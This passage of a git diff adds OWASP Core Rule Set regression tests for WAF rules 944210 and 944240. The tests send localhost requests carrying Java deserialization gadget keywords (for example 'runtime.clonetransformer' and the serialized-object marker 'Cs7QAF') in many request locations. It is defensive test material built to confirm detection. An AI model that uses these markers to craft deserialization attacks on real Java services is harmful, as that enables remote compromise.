stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Cookie name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type application/json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: 
"Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ Cs7QAF
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944210\""
+ - test_title: 944210-51
+ desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ Cs7QAF
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944210\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
new file mode 100644
index 00000000..69406997
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
@@ -0,0 +1,1703 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944240.yaml"
+ description: "Positive tests for rule 944240"
+tests:
+ - test_title: 944240-1
+ desc: "Argument test includes keyword runtime.clonetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.clonetransformer"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-2
+ desc: "Argument name includes keyword runtime.clonetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.clonetransformer=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-3
+ desc: "Cookie test includes keyword runtime.clonetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.clonetransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-4
+ desc: "Cookie name includes keyword runtime.clonetransformer"
+
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-6 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Cookie name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-19 + desc: "Nested XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-20 + desc: "Content-Type text/plain includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-21 + desc: "Content-Type application/json arg value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-22 + desc: "Content-Type application/json arg name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-23 + desc: "Argument test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-24 + desc: "Argument name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-25 + desc: "Cookie test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-26 + desc: "Cookie name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-27 + desc: "Request header test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-28 + 
desc: "XML attribute value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-29 + desc: "XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-30 + desc: "Nested XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-31 + desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-32 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-33 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-34 + desc: "Argument test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" 
+ method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-35 + desc: "Argument name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-36 + desc: "Cookie test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-37 + desc: "Cookie name includes keyword 